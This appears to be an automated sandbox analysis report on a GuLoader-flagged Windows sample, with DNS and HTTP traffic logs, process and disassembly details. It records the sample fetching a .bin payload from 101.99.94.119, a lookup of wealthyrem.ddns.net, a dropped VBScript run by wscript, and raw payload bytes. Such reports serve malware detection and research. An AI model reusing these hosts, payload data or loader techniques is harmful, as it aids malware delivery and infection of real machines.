Aug 3, 2021 09:50:07.162651062 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:08.450983047 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:08.484448910 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:09.460745096 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:09.493299961 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:10.580183983 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:10.605452061 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:11.391868114 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:11.425403118 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:12.533147097 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:12.558248997 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:13.693217039 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:13.721752882 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:16.217385054 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:16.243992090 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:16.909429073 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:16.936829090 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:17.741444111 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:17.772319078 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:18.457809925 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:18.485790014 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:19.433485031 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:19.462393999 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:32.419984102 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:32.456270933 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:37.631396055 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:37.673178911 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:53.027306080 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:53.056313038 CEST	53	58823	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:54.184706926 CEST	57568	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:54.212661028 CEST	53	57568	8.8.8.8	192.168.2.3
Aug 3, 2021 09:50:54.829355955 CEST	50540	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:50:54.865000963 CEST	53	50540	8.8.8.8	192.168.2.3
Aug 3, 2021 09:51:06.332206964 CEST	54366	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:51:06.374577045 CEST	53	54366	8.8.8.8	192.168.2.3
Aug 3, 2021 09:51:08.099805117 CEST	53034	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:51:08.132152081 CEST	53	53034	8.8.8.8	192.168.2.3
Aug 3, 2021 09:51:19.998214006 CEST	57762	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:51:20.048595905 CEST	53	57762	8.8.8.8	192.168.2.3
Aug 3, 2021 09:51:26.368093014 CEST	55435	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:51:26.406167984 CEST	53	55435	8.8.8.8	192.168.2.3
Aug 3, 2021 09:51:54.770961046 CEST	50713	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:51:54.819643021 CEST	53	50713	8.8.8.8	192.168.2.3
Aug 3, 2021 09:51:58.437495947 CEST	56132	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:51:58.479460001 CEST	53	56132	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:03.800883055 CEST	58987	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:52:03.835515976 CEST	53	58987	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:55.178214073 CEST	56579	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:52:55.246586084 CEST	53	56579	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:55.928847075 CEST	60633	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:52:55.966856003 CEST	53	60633	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:56.515408993 CEST	61292	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:52:56.555078983 CEST	53	61292	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:56.991461039 CEST	63619	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:52:57.026705980 CEST	53	63619	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:57.575887918 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:52:57.608617067 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:58.152482986 CEST	61946	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:52:58.190172911 CEST	53	61946	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:58.831623077 CEST	64910	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:52:58.865165949 CEST	53	64910	8.8.8.8	192.168.2.3
Aug 3, 2021 09:52:59.994276047 CEST	52123	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:53:00.027309895 CEST	53	52123	8.8.8.8	192.168.2.3
Aug 3, 2021 09:53:00.936120987 CEST	56130	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:53:00.971250057 CEST	53	56130	8.8.8.8	192.168.2.3
Aug 3, 2021 09:53:01.997314930 CEST	56338	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:53:02.031568050 CEST	53	56338	8.8.8.8	192.168.2.3
Aug 3, 2021 09:54:54.472569942 CEST	59420	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:54:54.508253098 CEST	53	59420	8.8.8.8	192.168.2.3
Aug 3, 2021 09:54:54.953653097 CEST	58784	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:54:54.986418009 CEST	53	58784	8.8.8.8	192.168.2.3
Aug 3, 2021 09:54:59.222904921 CEST	63978	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:54:59.255475998 CEST	53	63978	8.8.8.8	192.168.2.3
Aug 3, 2021 09:55:03.005989075 CEST	62938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:55:03.039793015 CEST	53	62938	8.8.8.8	192.168.2.3
Aug 3, 2021 09:55:03.251657009 CEST	55708	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:55:03.295259953 CEST	53	55708	8.8.8.8	192.168.2.3
Aug 3, 2021 09:57:24.651887894 CEST	56803	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:57:24.652589083 CEST	57145	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:57:24.687371016 CEST	53	56803	8.8.8.8	192.168.2.3
Aug 3, 2021 09:57:24.688313007 CEST	53	57145	8.8.8.8	192.168.2.3
Aug 3, 2021 09:57:25.117799997 CEST	55359	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:57:25.151722908 CEST	53	55359	8.8.8.8	192.168.2.3
Aug 3, 2021 09:57:25.615422964 CEST	58306	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:57:25.683232069 CEST	53	58306	8.8.8.8	192.168.2.3
Aug 3, 2021 09:57:58.535772085 CEST	64124	53	192.168.2.3	8.8.8.8
Aug 3, 2021 09:57:58.584244967 CEST	53	64124	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 09:52:03.800883055 CEST	192.168.2.3	8.8.8.8	0xdf97	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 3, 2021 09:52:03.835515976 CEST	8.8.8.8	192.168.2.3	0xdf97	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 09:54:54.508253098 CEST	8.8.8.8	192.168.2.3	0xf46a	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 09:57:25.151722908 CEST	8.8.8.8	192.168.2.3	0xd836	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

101.99.94.119

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49732	101.99.94.119	80	C:\Users\user\Desktop\Fec9qUX4at.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 09:52:02.600111008 CEST	7678	OUT	GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 101.99.94.119 Cache-Control: no-cache
Aug 3, 2021 09:52:02.647567034 CEST	7679	IN	HTTP/1.1 200 OK Date: Mon, 02 Aug 2021 23:52:02 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 Last-Modified: Mon, 02 Aug 2021 21:02:57 GMT ETag: "72840-5c899e4c3da73" Accept-Ranges: bytes Content-Length: 469056 Content-Type: application/octet-stream Data Raw: 31 79 a2 69 b5 67 ac a3 66 68 89 94 04 1b b4 8f c9 36 a1 00 58 5a db 92 66 6d cc 77 0a bf 4e 76 be cb df 4e 9d df 64 5e 44 ed 21 f3 cf f9 7d 62 b4 1b 44 fc 1e d1 54 51 7a 33 c1 4c df e6 15 ab fc 9f 41 d1 41 8f 51 31 14 c8 d8 11 ba 23 86 c1 35 93 9d fc 44 9e 32 ca a0 fd 73 d9 cb f8 37 88 87 1a 45 0a f7 90 fa bf 49 a3 1e a6 e2 63 d3 da f7 1b 8c 3f 3b 56 fb 73 f5 5f 71 11 21 67 d6 a5 5b 6f 63 6f 44 5d 92 7d a4 66 fa 44 00 3d 71 d6 5c 03 88 d7 97 a0 3d f6 3d 55 3c 74 0e f3 18 b3 74 b0 8f 9b fc 7f 70 16 c6 64 54 6e 65 de 18 f0 d3 5c bc 13 45 22 ac 24 20 7e 82 b9 70 76 a4 7d 01 f7 d5 61 be 6f 06 f4 2c 87 a6 b3 20 b2 ad 40 2e d1 2f 53 60 03 72 48 d8 a8 33 13 0a f2 ff d2 dd 78 63 a0 8b 27 17 28 0e 60 82 f6 72 ae 94 e0 7b d9 7f 8e c3 dd 64 b8 7a 3f 9c de 07 ce e8 0f a5 e2 f6 89 60 01 25 fd 8a 32 fc 79 07 a7 ab df eb 97 4a 2c 9a 34 91 22 ae 83 f5 10 09 71 2b 83 86 cf 6e c1 fd 78 9b ff 23 b1 96 1b 1e b1 63 5b 3d 90 ef 89 7e 8a 22 4d e5 54 77 c8 44 5a ca a4 4c 7d b5 c0 fc c0 dd 2e 18 32 28 dd ca 3a 96 9c 05 f0 1c 01 92 09 ad 55 8b 34 03 76 7c 2a c7 57 01 af c3 92 f4 fe a1 46 ae cb 12 c4 67 bb f2 9c 4b c8 90 cb 0b 36 3d a2 cf d6 65 cd 91 6d 1a 7b b3 ae 5d b5 71 0a 24 46 d2 95 ab 70 f8 9c 0c 0f 55 c2 c0 0c ed 95 d2 b5 e3 48 48 bc f0 3e 3a 82 e8 91 28 22 11 91 fd 50 31 d0 48 57 96 73 6f 6f ab 25 0c 11 ac 70 08 53 83 83 3f b8 3e c5 49 ba 0a e0 6c cd 20 3a db 77 67 8e fb 36 1e cb 1f 01 03 9a 71 8e 49 ed 61 2c 69 21 ad ce f9 ee ff ec 84 8e 6d 86 db b8 3f b7 03 e2 7f 24 ba 8c 67 c8 40 b0 eb df 8a b4 91 9b 4f 28 1a 3b 00 71 28 06 b7 a3 84 fa b2 23 5c 4c 76 b9 6d c0 ea b6 ba 5f 07 9a 82 96 5b b9 53 9d 33 fd 1b e9 51 5d 11 32 aa ab 37 a4 e9 e4 ed 8f 5f a9 dd 16 e8 f1 02 6d 5d 93 67 0b b1 97 41 ba 80 65 d4 cc ba 7e b1 6e be 4b 0a b7 2c 68 50 ad 15 84 32 c1 47 3e 78 a2 f0 ac 5e f6 53 15 d2 d0 93 e0 68 65 1c ab 21 69 d6 3b e3 69 9c 2b 10 57 7b 25 d8 99 a9 23 1e 80 6a 8b d0 4c c9 98 5f 04 ad 20 6e 20 e0 d4 86 3d d5 78 c0 63 00 93 0d 76 4f fd ab d5 50 53 0c fd ae b8 f8 84 03 9c dc 98 09 3d 1f 8f 80 de 9c d3 a6 97 0b fa 1a 66 11 63 4d 31 1f 06 d7 7e 4c ea b2 0d 17 00 0e 9f e1 20 97 00 06 32 b2 d4 a3 8a ef 7a 40 7f dd 0c 11 b7 be c1 20 e1 bb 88 08 d8 e9 42 02 00 36 78 93 28 da 41 52 f9 96 9e c3 54 a2 68 b6 e1 93 f8 b8 d3 15 6d 42 73 42 64 ce 30 64 40 c6 a3 ef ed a2 d8 77 ce b3 d0 4e 87 51 cd 57 42 a7 9e 1f fa 7c 71 00 a0 0e f5 10 6a ff 84 ee f7 d2 d0 7f 20 ec 19 ab 75 73 9c 02 41 31 3d 88 d3 19 ed 16 29 30 07 c6 5c c1 5b bd a4 4b 02 bc c6 24 24 f2 cb 2e 0a a2 1f a2 53 16 ba b6 66 85 70 87 87 55 7d 12 44 66 c1 b9 46 4e 1e a0 dc 7a e0 ca 8e 6e f8 1e 4b 3f 65 f2 b4 35 8e 12 2c b3 7e 16 04 83 d2 5c fc e9 9c 64 d2 98 66 e9 42 4b 0b ac c1 11 2d 8f b1 c5 d1 d1 42 8f 51 31 10 c8 d8 11 45 dc 86 c1 8d 93 9d fc 44 9e 32 ca e0 fd 73 d9 cb f8 37 88 87 1a 45 0a f7 90 fa bf 49 a3 1e a6 e2 63 d3 da f7 1b 8c 3f 3b 56 fb 73 f5 5f 71 11 31 66 d6 a5 55 70 d9 61 44 e9 9b b0 85 de fb 08 cd 1c 25 be 35 70 a8 a7 e5 cf 5a 84 5c 38 1c 17 6f 9d 76 dc 00 90 ed fe dc 0d 05 78 e6 0d 3a 4e 21 91 4b d0 be 33 d8 76 6b 2f a1 2e 04 7e 82 b9 70 76 a4 7d ab 74 97 51 50 8d 2a 97 c2 65 8a Data Ascii: 1yigfh6XZfmwNvNd^D!}bDTQz3LAAQ1#5D2s7EIc?;Vs_q!g[ocoD]}fD=q\==U<ttpdTne\E"$ ~pv}ao, @./S`rH3xc'(`r{dz?`%2yJ,4"q+nx#c[=~"MTwDZL}.2(:U4v\|WFgK6=em{]q$FpUHH>:("P1HWsoo%pS?>Il :wg6qIa,i!m?$g@O(;q(#\Lvm_[S3Q]27_m]gAe~nK,hP2G>x^She!i;i+W{%#jL_ n =xcvOPS=fcM1~L 2z@ B6x(ARThmBsBd0d@wNQWB\|qj usA1=)0\[K$$.SfpU}DfFNznK?e5,~\dfBK-BQ1ED2s7EIc?;Vs_q1fUpaD%5pZ\8ovx:N!K3vk/.~pv}tQPe
Aug 3, 2021 09:52:02.647619009 CEST	7681	IN	Data Raw: d0 ce 50 81 23 74 af f2 30 9c e1 5e 2b 82 d6 ec 70 45 10 d3 b1 87 06 bd c3 7b c5 3b 4b e9 fa 2a 95 9d 4c b8 83 0b 9b 94 ed 2f 3f 48 db af 83 b3 bc f3 2c c4 6c 70 5e df eb b4 e3 09 9e 5f 37 34 db 8d 45 6f df 03 0d f5 27 16 f1 f8 41 a8 b8 3c 71 f8 Data Ascii: P#t0^+pE{;KL/?H,lp^_74Eo'A<qY/_e_S.R=?Zm9,kZxWEU64r?sGEg]z+<6="yy"F:p()S%}>/JPU*`/
Aug 3, 2021 09:52:02.647640944 CEST	7682	IN	Data Raw: 5e df 1d 06 8e 33 f3 2a 03 4b 17 e8 9b 74 e3 20 ff ac 2f 77 f2 3c 5e 95 c3 0e 75 cf 11 c0 dd 7b 7b 0d ec 2d 77 a4 c2 14 25 8c 57 8b da 6f d0 38 d9 81 02 06 e3 92 3c 21 aa 80 aa f1 d0 f8 3b d7 37 57 e7 4f ad fb 45 75 44 41 06 f3 10 68 a8 27 02 c2 Data Ascii: ^3*Kt /w<^u{{-w%Wo8<!;7WOEuDAh'[WNN]JqM<$qtr-iJalSgPMa({`7J_<_":LADE6a30q^'-PZM!#Jal"54C
Aug 3, 2021 09:52:02.647659063 CEST	7683	IN	Data Raw: 2c da 55 4a 09 01 ea 4d aa de cb 63 df 51 7c c2 1f aa fe 50 40 af 88 25 e5 47 5a bf 00 4f ac 49 8a b3 4b c2 11 27 1b 88 f1 18 e5 21 ec 31 1a b6 bf de 16 3b b0 50 5e 0a 64 c5 3e 9d 26 34 dc b6 87 c3 00 2a 7b 0a ed 95 b8 d4 6d 83 a1 d5 c0 3e 3a 23 Data Ascii: ,UJMcQ\|P@%GZOIK'!1;P^d>&4*{m>:#i"Q6whl!W`;IT(mw2LWB(/avy?Eqxw@g#rC[(Bcq+N7Cwd7}[\|G9B+LqX
Aug 3, 2021 09:52:02.694133997 CEST	7685	IN	Data Raw: 08 36 f9 43 55 37 3f 1f df c6 91 44 4a e6 6c 2f 7d 7a d9 b6 ed c6 a0 72 85 55 2d 45 cf a9 13 54 44 4e f0 f6 34 cc f1 ca 8e 37 a1 9a 8b 4b 42 a4 39 30 86 99 a5 e3 96 82 07 83 d2 d7 0c 62 57 e9 97 64 36 01 86 48 0b ac 3e 27 a6 40 4e f5 39 76 53 8f Data Ascii: 6CU7?DJl/}zrU-ETDN47KB90bWd6H>'@N9vSQo3D1vsEE\\|a!KQ9X=;Vp$Z x1@Gc%`DZ{)0JivWS6OFUpk/*Z#@pUPIEtV4+F:L{k
Aug 3, 2021 09:52:02.694166899 CEST	7686	IN	Data Raw: e2 02 86 7d 30 90 d3 96 a2 6e c2 0a a6 74 22 c4 de 92 f3 27 50 dc 4a fc 1d f4 ec 52 13 64 c8 40 bb 67 11 ea f7 92 9b 7f bb 69 37 b3 bf ef 06 b8 a3 84 fa 5a 65 59 4c 76 e7 e6 25 b7 74 b2 5f 2b a9 87 96 43 32 53 5e 0e 1a f1 bf 9a ac f9 e9 57 54 c8 Data Ascii: }0nt"'PJRd@gi7ZeYLv%t_+C2S^WT/odX~FgZNGt.Y`KqXAFxa>#8Wvj+@dv(-gpK=k_UK^F{W\|M=\BZv(]6(Y
Aug 3, 2021 09:52:02.694184065 CEST	7687	IN	Data Raw: 76 f5 5f fa 64 39 ed 19 9e 93 02 81 89 3a 17 64 4f bc ee 88 1b 46 d3 cd 43 cd 8f 57 2c 2a 30 6a d2 b4 f9 1f 17 6f 76 47 5c 7d 9c ed 8a c3 8e fb 68 95 17 b1 81 c9 4e b3 2f 41 b8 17 fd 6b 14 51 21 46 b8 d2 d3 71 9e c3 87 54 8b 7c 5d d5 7b 5f 9d 94 Data Ascii: v_d9:dOFCW,0jovG\}hN/AkQ!FqT\|]{_E8P#Y?!v@,NKS6/?D5%z&T;s4a.EX~@5wU6t/YdpO/`J?s>(A~J#]":oA
Aug 3, 2021 09:52:02.694204092 CEST	7689	IN	Data Raw: d8 48 3a 38 05 0f 92 9a 76 af 4b 69 3e 64 11 6b 9c e7 45 dc 97 74 27 ec 75 cb a8 13 bb 06 3f e5 55 ae 5f 04 25 7c bd 62 db 26 0e 75 2a 07 87 a9 8b 4c 83 93 12 3e fe 5e bc 39 0e 02 db b4 07 f1 4b 74 c1 30 d8 a6 fd 3f ed 83 5e db fa ff 80 16 70 c7 Data Ascii: H:8vKi>dkEt'u?U_%\|b&uL>^9Kt0?^pAj?MS] ~&2Kl,U<-}h6Arz`hYyR_ZmzH/4+WW,rus;CA$LXh@Hw#t_Cz4l/Rl@4
Aug 3, 2021 09:52:02.694253922 CEST	7690	IN	Data Raw: 5b 56 1c d3 3b e7 b6 00 82 29 b0 e3 5c 15 b3 dd 82 4c 40 b4 6f 64 e2 f2 0a c4 1c de 36 59 7b be af 52 73 5c ef de 0b 8c b4 9a 74 ee a1 f6 5e 5a ce b6 19 cb ba c7 bb a8 01 9f 99 3b 85 e0 5f c2 e1 5f 55 e7 b8 9c 11 bf b1 c0 a9 4b 31 7f 4e bf 6d c9 Data Ascii: [V;)\L@od6Y{Rs\t^Z;__UK1NmA(9"L+!(O=m{5J=!ghJ5&=vP:HI}{2eL#cPa]?hE[k/>to0)kJw 8\.87q1
Aug 3, 2021 09:52:02.694274902 CEST	7691	IN	Data Raw: d7 25 ca 0f ed 1d 55 4a 11 ae 9f 67 6a d3 73 68 38 ec 31 ee 15 a0 b3 ce 30 54 69 83 ab c4 da 2d 9d 63 f1 6c a3 6d 49 dc 03 bf fa 4e 61 e0 f9 39 79 8b 6e 0d 32 00 82 54 2d 3f 7a a2 e7 14 23 2f 49 3b 5d ae 63 fd c2 f2 31 03 da 15 66 16 a0 f1 04 05 Data Ascii: %UJgjsh810Ti-clmINa9yn2T-?z#/I;]c1fW8>99P\|~B&2y\|&1rpw#Y#yKWfFjXhg(9S#em.Fo\4HcX+cc~}B9Zumu25O
Aug 3, 2021 09:52:02.694294930 CEST	7693	IN	Data Raw: 38 0e f0 7d ce b0 7d 95 f5 9b 45 15 d5 43 1f 20 61 f3 e6 4c c3 c1 0c d6 4d a1 8b b5 c3 87 54 5f da c5 7d eb 44 3b a9 df c5 15 f4 d5 2f b7 54 53 23 87 b0 73 da e3 92 68 6c 83 9d 7c f6 37 50 b1 31 b6 45 09 27 e7 03 33 7f d7 27 8f 0c 1f c9 e1 c8 d8 Data Ascii: 8}}EC aLMT_}D;/TS#shl\|7P1E'3'a}et"ly$<:(d:,Osi$ylVXF?qH8Qfyn.wFt:YR+313m}`G/DFKtJVP@[]PjkK)SWvV

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Fec9qUX4at.exe PID: 1304 Parent PID: 5516

General

Start time:	09:50:05
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\Fec9qUX4at.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Fec9qUX4at.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	2046B941817392E3815535FCCB1F39DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: Fec9qUX4at.exe PID: 1152 Parent PID: 1304

General

Start time:	09:51:04
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\Fec9qUX4at.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Fec9qUX4at.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	2046B941817392E3815535FCCB1F39DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 808 Parent PID: 1152

General

Start time:	09:52:15
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs'
Imagebase:	0x1090000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Fec9qUX4at.exe PID: 1304 Parent PID: 5516 Fec9qUX4at.exeCOMMON

Executed Functions

Function 04F505E0, Relevance: 13.1, APIs: 2, Strings: 5, Instructions: 805COMMON

Download Yara Rule

APIs

EnumWindows.USER32(04F506AE,?,00000000,00000099), ref: 04F5061A

Strings

_o7, xrefs: 04F506BB
gyK, xrefs: 04F54F60
H}e>, xrefs: 04F54EBE
pB, xrefs: 04F5520A
oi~, xrefs: 04F548A6

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID: H}e>$gyK$_o7$oi~$pB
API String ID: 1129996299-3019485797
Opcode ID: c08e1a3aa33043583c2541d0baa4b41624530c4050139f8ac9839203675099c3
Instruction ID: 877cd36aa33bd78629218d710188da78b6002e078470d31397650d79a0c8ed5e
Opcode Fuzzy Hash: c08e1a3aa33043583c2541d0baa4b41624530c4050139f8ac9839203675099c3
Instruction Fuzzy Hash: 7C720FB26043899FDB749F74CD857DA7BA2FF59300F51812DDD899B224D7309A82CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04F52D7C, Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 891COMMON

Download Yara Rule

Strings

_o7, xrefs: 04F506BB
:V9v, xrefs: 04F5302D
), xrefs: 04F52FDB
rp}, xrefs: 04F53270
6=lL, xrefs: 04F533F2

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: )$6=lL$:V9v$rp}$_o7
API String ID: 1029625771-398544117
Opcode ID: ab5a5f59e298f04d2f6d81b490f8d1fdd7cd981fa046593a45dab95151b6aeae
Instruction ID: 7a8b4ee4c0c296987f7e00c2618a406717f4ed2f960d0be0bb612d05e69b1d3d
Opcode Fuzzy Hash: ab5a5f59e298f04d2f6d81b490f8d1fdd7cd981fa046593a45dab95151b6aeae
Instruction Fuzzy Hash: 6172CE71A043899FDB34DF28CC94BDAB7E5FF49350F454229ED899B250D730AA42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04F509C7, Relevance: 9.7, APIs: 1, Strings: 4, Instructions: 932COMMON

Download Yara Rule

Strings

gyK, xrefs: 04F54F60
H}e>, xrefs: 04F54EBE
pB, xrefs: 04F5520A
oi~, xrefs: 04F548A6

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: H}e>$gyK$oi~$pB
API String ID: 2616484454-3551811396
Opcode ID: 1c49ce5a63e17d3c6ffff50efadc58402c7804c16d51400820efeaf83ce32a5b
Instruction ID: 386bc58ccfd27198c0ac162b15cb5d5da9f1e339ffe0cd947ac0ad65a3b5d127
Opcode Fuzzy Hash: 1c49ce5a63e17d3c6ffff50efadc58402c7804c16d51400820efeaf83ce32a5b
Instruction Fuzzy Hash: FC8221B1604389DFDB749F78CC947DA7BA2FF58300F55812DDD899B224D770AA828B42

Uniqueness

Uniqueness Score: -1.00%

Function 04F542D5, Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 693nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 04F573C9: LoadLibraryA.KERNELBASE(?,F4416618,?,04F5865C,04F54467,8114A817,-8997EACD,F756DDE1,-B4751CA4,?), ref: 04F5759A

NtWriteVirtualMemory.NTDLL(?,4332E5BA,?,00000000,?,?,?,?,7630731F,?,-ACB54D55,-4F4731C0), ref: 04F54FEA

Strings

gyK, xrefs: 04F54F60
H}e>, xrefs: 04F54EBE
pB, xrefs: 04F5520A
oi~, xrefs: 04F548A6

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: H}e>$gyK$oi~$pB
API String ID: 3569954152-3551811396
Opcode ID: 2bb03529fb0ba9961a954f47862e2321709f4696f0b95c9275cc96988d46296a
Instruction ID: 68da5b23eca63c41be976589f30d64e407bd6a815351ceba1632deb8fd43047a
Opcode Fuzzy Hash: 2bb03529fb0ba9961a954f47862e2321709f4696f0b95c9275cc96988d46296a
Instruction Fuzzy Hash: 415222B260438A9FDB748F74CD557DABBA2FF45310F44422DDE999B260D370AA81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04F50C76, Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 642COMMON

Download Yara Rule

APIs

Part of subcall function 04F5586A: NtAllocateVirtualMemory.NTDLL(46C45625,?,-18D0B40B), ref: 04F55ACC

TerminateProcess.KERNELBASE ref: 04F55460

Strings

e, xrefs: 04F56DC8
}(;T, xrefs: 04F512E0
*U, xrefs: 04F51629
|@M}, xrefs: 04F510B0

Memory Dump Source

Source File: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Offset: 04F50000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryProcessTerminateVirtual
String ID: |@M}$}(;T$*U$e
API String ID: 2292769835-3084222780
Opcode ID: e3ad0b3daaa2625dee04ef3fb2c275cf52a02a8ee10dd852737203d607aefddc
Instruction ID: e593087fc7c0892b180152fbd31265042c731065898b53bdb9c147422fc82a2d
Opcode Fuzzy Hash: e3ad0b3daaa2625dee04ef3fb2c275cf52a02a8ee10dd852737203d607aefddc
Instruction Fuzzy Hash: 71420571A04389DBDB74AF38CC887DE7BE1AF54310F45412EDD89DB265D730AA428B52

Uniqueness

Uniqueness Score: -1.00%

Function 04F5475A, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 493nativeCOMMON

Download Yara Rule

APIs

